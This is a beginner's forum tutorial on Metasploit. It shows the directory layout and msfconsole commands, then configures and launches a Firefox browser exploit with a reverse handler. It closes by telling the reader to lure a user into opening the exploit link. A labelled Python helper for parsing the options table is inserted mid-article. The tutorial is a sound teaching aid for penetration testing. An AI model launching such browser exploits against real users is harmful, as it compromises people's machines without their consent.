How to get started with Metasploit

This is an article by lionaneesh on how to get started with Metasploit, in Ethical Hacking Tips.
Metasploit is a penetration-testing framework that bundles tools, exploits and a large body of vulnerability knowledge. It is a boon to pen-testers, exploit developers and hackers alike.

The project was started by H.D. Moore and is now an open-source project managed by Rapid7.

For download and installation instructions, click here.

I will use my Ubuntu 10.10 system for the code samples, so some commands may differ on other OS versions. If you have queries or questions, please don't hesitate to post them in the comments below.

The directory structure

Metasploit has a very self-explanatory and user-friendly directory structure.

On Linux the Metasploit directory is located at /opt/metasploit3.

Code:
aneesh@aneesh-laptop:~$ cd /opt/metasploit3/
aneesh@aneesh-laptop:/opt/metasploit3$
Let's look at the different directories:

Code:
aneesh@aneesh-laptop:/opt/metasploit3$ ls
app  bin  env.sh  lib  msf3  run.sh
aneesh@aneesh-laptop:/opt/metasploit3$ cd msf3/
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ ls
armitage       HACKING  msfconsole  msfgui       msfpescan  plugins  tools
data           lib      msfd        msfmachscan  msfrpc     README
documentation  modules  msfelfscan  msfopcode    msfrpcd    scripts
external       msfcli   msfencode   msfpayload   msfupdate  test
aneesh@aneesh-laptop:/opt/metasploit3/msf3$
The data directory: contains the basic data used by exploits, such as PHP sources, wordlists and similar resources.

Code:
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd data/
aneesh@aneesh-laptop:/opt/metasploit3/msf3/data$ ls
armitage             isight.bundle            passivex   vncdll.dll
eicar.com            java                     php        vncdll.x64.dll
eicar.txt            lab                      post       wmap
emailer_config.yaml  meterpreter              snmp       wordlists
exploits             msfcrawler               sounds
gui                  msflinker_linux_x86.bin  sql
ipwn                 msfpescan                templates
The lib directory: as the name suggests, it holds all the libraries Metasploit needs to run.

The directory of greatest use to us is the modules directory:

Code:
aneesh@aneesh-laptop:/opt/metasploit3/msf3$ cd modules
aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$ ls
auxiliary  encoders  exploits  modules.rb.ts.rb  nops  payloads  post
aneesh@aneesh-laptop:/opt/metasploit3/msf3/modules$
  • The exploits dir: contains the exploits for various platforms and architectures.
  • The encoders dir: contains the various encoders used to encode payloads and web pages.
  • The auxiliary dir: contains tools used during pen-testing, such as DoS modules, sniffers and scanners.
  • The payloads and nops dirs: provide the shellcode used after exploitation (code execution).

Getting to know Metasploit

The main thing to know about Metasploit is its interface types. The four main interfaces are:
  1. msfweb (The Web Interface)
  2. msfgui (The graphical user interface)
  3. msfconsole (The console interface)
  4. msfcli (The command line interface)
The most powerful and most used interface is the console interface, so we'll be using it throughout this tutorial.

To open Metasploit, just type 'msfconsole' in your shell; you should get output similar to this:
Code:
aneesh@aneesh-laptop:~$ msfconsole
                                  _
                                 | |      o
 _  _  _    _ _|_  __,   ,    _  | |  __    _|_
/ |/ |/ |  |/  |  /  |  / \_|/ \_|/  /  \_|  |
  |  |  |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
                           /|
                           \|

       =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 643 exploits - 328 auxiliary
+ -- --=[ 216 payloads - 27 encoders - 8 nops
       =[ svn r11647 updated today (2011.01.26)

msf >
Now that we know how to open Metasploit, let's look at some of its modules.

We use several commands for this:

The show command, which lists every loaded module. Syntax: show all
The search command, which lists only the modules matching a pattern. Syntax: search (pattern)

For example, let's search for Firefox exploits and see what's in store for us:

Code:
msf > search firefox
[*] Searching loaded modules for pattern 'firefox'...

Exploits
========

   Name                                              Disclosure Date  Rank       Description
   ----                                              ---------------  ----       -----------
   multi/browser/firefox_escape_retval               2006-07-14       normal     Firefox 3.5 escape() Return Value Memory Corruption
   multi/browser/firefox_queryinterface              2006-02-02       normal     Firefox location.QueryInterface() Code Execution
   multi/browser/mozilla_compareto                   2005-07-13       normal     Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
   multi/browser/mozilla_navigatorjava               2006-07-25       normal     Mozilla Suite/Firefox Navigator Object Code Execution
   windows/browser/apple_quicktime_rtsp              2007-01-01       normal     Apple QuickTime 7.1.3 RTSP URI Buffer Overflow
   windows/browser/awingsoft_winds3d_sceneurl        2009-11-14       excellent  AwingSoft Winds3D Player 3.5 SceneURL Download and Execute
   windows/browser/dxstudio_player_exec              2009-06-09       excellent  Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution
   windows/browser/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)

msf >
You will notice that many of the exploits target browser vulnerabilities, and some of them may be useful for us.

This is the power of Metasploit!

Let's use the 'use' command to select an exploit.

Syntax:
Code:
use (path)
Output:
Code:
msf > use exploit/multi/browser/firefox_escape_retval
msf exploit(firefox_escape_retval) >
Now let's see the options.
Code:
show options
Output:
Code:
msf exploit(firefox_escape_retval) > show options

Module options (exploit/multi/browser/firefox_escape_retval):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Firefox 3.5.0 on Windows XP SP0-SP3
Let us now set the options. This is done with:

Code:
set (option name) (value)
Now let's set some options according to our needs:
Code:
msf exploit(firefox_escape_retval) > set SRVHOST localhost
SRVHOST => localhost
msf exploit(firefox_escape_retval) > set SRVPORT 80
SRVPORT => 80
msf exploit(firefox_escape_retval) > set URIPATH /exploit
URIPATH => /exploit
Explanations:
  1. 'set SRVHOST localhost' sets the host on which our exploit page is served.
  2. 'set SRVPORT 80' sets the port number the server listens on; port 80 is the default for web servers, so we use it.
  3. 'set URIPATH /exploit' sets the URL path at which the exploit page is served.

This means the victim has to be made to open the page at http://localhost/exploit for the exploit to work.
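Before running a module it pays to check that every option marked "yes" in the Required column has a value. As an added example (not part of the original article and not Metasploit code), here is a small Python parser for the 'show options' table shown above; the sample text is constructed from the page's table plus one extra LHOST row, added as an unset required option.

```python
"""Parse the 'Module options' table that msfconsole prints for 'show options'
and report the required options that still have no value. This is an added
example, not Metasploit code; the sample text is constructed from the page."""

# Constructed sample: the page's table plus one LHOST row, added here as an
# unset required option (it is not in the page's real output).
SAMPLE_OUTPUT = """\
Module options (exploit/multi/browser/firefox_escape_retval):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)
   LHOST                        yes       The listen address (constructed row)

Exploit target:
"""

HEADER = ["Name", "Current", "Setting", "Required", "Description"]

def parse_options(text):
    """Return {name: (value, required, description)} for every option row.
    Fields are cut at the header's column offsets, since a value may be empty."""
    options, cols = {}, None
    for line in text.splitlines():
        if cols is None:                   # still looking for the header row
            if line.split() == HEADER:
                cols = [line.index(h) for h in
                        ("Name", "Current Setting", "Required", "Description")]
            continue
        if not line.strip():
            continue                       # the forum rendering has blank rows
        if not line[0].isspace():
            break                          # unindented text ends the table
        if set(line.strip()) <= {"-", " "}:
            continue                       # the ---- underline row
        name = line[cols[0]:cols[1]].strip()
        value = line[cols[1]:cols[2]].strip()
        required = line[cols[2]:cols[3]].strip().lower() == "yes"
        options[name] = (value, required, line[cols[3]:].strip())
    return options

def missing_required(options):
    """Names of required options whose Current Setting is empty; each of
    these needs a 'set' before 'exploit' is typed."""
    return sorted(n for n, (v, req, _) in options.items() if req and not v)
```

missing_required(parse_options(SAMPLE_OUTPUT)) returns ['LHOST'] for the sample, because URIPATH is empty but not required.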

Now that the options are set, let's run the exploit. This is done with:

Code:
exploit
Output:
Code:
msf exploit(firefox_escape_retval) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.10.2.35:4444 
[*] Using URL: http://localhost:80/exploit
[*] Server started.
The output states that the exploit server has been started successfully.

From here on the work gets a lot easier: we just have to get a user running the vulnerable browser to open this link.

I hope this is enough to get you started working with Metasploit.
lionaneesh (Invasive contributor), 27Jan2011, 16:46   #2
Thanks Shabbir...
For accepting my articles and making them much better with the edits...

Thanks a ton!!!